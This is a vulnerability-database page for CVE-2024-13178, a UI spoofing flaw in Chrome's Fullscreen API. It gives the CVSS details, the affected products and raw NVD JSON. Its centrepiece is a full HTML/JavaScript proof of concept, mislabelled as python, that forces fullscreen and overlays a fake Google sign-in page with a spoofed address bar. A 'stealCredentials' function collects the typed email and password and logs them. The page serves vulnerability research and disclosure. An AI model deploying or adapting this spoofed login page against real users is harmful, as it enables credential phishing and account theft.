Security Vulnerability Report
δΈ­ζ–‡
CVE-2024-13178 CVSS 4.3 MEDIUM

CVE-2024-13178

Published: 2025-11-14 03:15:55
Last Modified: 2025-11-17 12:25:14
Source: [email protected]

Description

Inappropriate implementation in Fullscreen in Google Chrome prior to 128.0.6613.84 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Google Chrome < 128.0.6613.84

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2024-13178 PoC - UI Spoofing via Fullscreen API --> <!DOCTYPE html> <html> <head> <title>CVE-2024-13178 UI Spoofing PoC</title> <style> body { margin: 0; background: #1a1a2e; color: white; font-family: Arial, sans-serif; } .fake-ui { position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); display: flex; flex-direction: column; align-items: center; justify-content: center; z-index: 999999; } .fake-address-bar { position: fixed; top: 0; left: 0; width: 100%; height: 40px; background: #f8f9fa; display: flex; align-items: center; padding: 0 10px; box-sizing: border-box; color: #333; font-size: 14px; } .fake-form { background: white; padding: 30px; border-radius: 10px; box-shadow: 0 10px 30px rgba(0,0,0,0.3); text-align: center; } input { width: 250px; padding: 10px; margin: 10px 0; border: 1px solid #ccc; border-radius: 5px; color: #333; } .attack-btn { background: #4285f4; color: white; border: none; padding: 12px 30px; border-radius: 5px; cursor: pointer; font-size: 16px; } </style> </head> <body> <div id="malicious-content" style="display:none;"> <div class="fake-ui"> <div class="fake-address-bar">πŸ”’ https://www.google.com</div> <div class="fake-form"> <h2 style="color:#333;">Sign in to Google</h2> <input type="text" placeholder="Email or phone"> <input type="password" placeholder="Password"> <button class="attack-btn" onclick="stealCredentials()">Sign In</button> </div> </div> </div> <h1>CVE-2024-13178 UI Spoofing Demo</h1> <p>Click the button below to trigger fullscreen and see UI spoofing in action.</p> <button onclick="requestFullscreen()" style="padding:15px 30px;font-size:18px;cursor:pointer;"> Enter Fullscreen (Click to trigger) </button> <script> async function requestFullscreen() { try { // Create and append malicious UI elements const maliciousDiv = document.createElement('div'); maliciousDiv.innerHTML = document.getElementById('malicious-content').innerHTML; document.body.appendChild(maliciousDiv); // Request fullscreen on body await document.documentElement.requestFullscreen(); // Overlay attack content document.querySelector('.fake-ui').style.display = 'flex'; } catch (err) { console.error('Fullscreen request failed:', err); } } function stealCredentials() { // Simulate credential theft const inputs = document.querySelectorAll('input'); const credentials = { email: inputs[0].value, password: inputs[1].value }; console.log('Stolen credentials:', credentials); alert('Credentials captured! (This is a demo)'); } </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-13178", "sourceIdentifier": "[email protected]", "published": "2025-11-14T03:15:55.220", "lastModified": "2025-11-17T12:25:13.680", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Inappropriate implementation in Fullscreen in Google Chrome prior to 128.0.6613.84 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-451"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "128.0.6613.84", "matchCriteriaId": "DAE0C7AB-1D61-4449-BC82-915B019F311F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2024/08/stable-channel-update-for-desktop_21.html", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://issues.chromium.org/issues/40068607", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.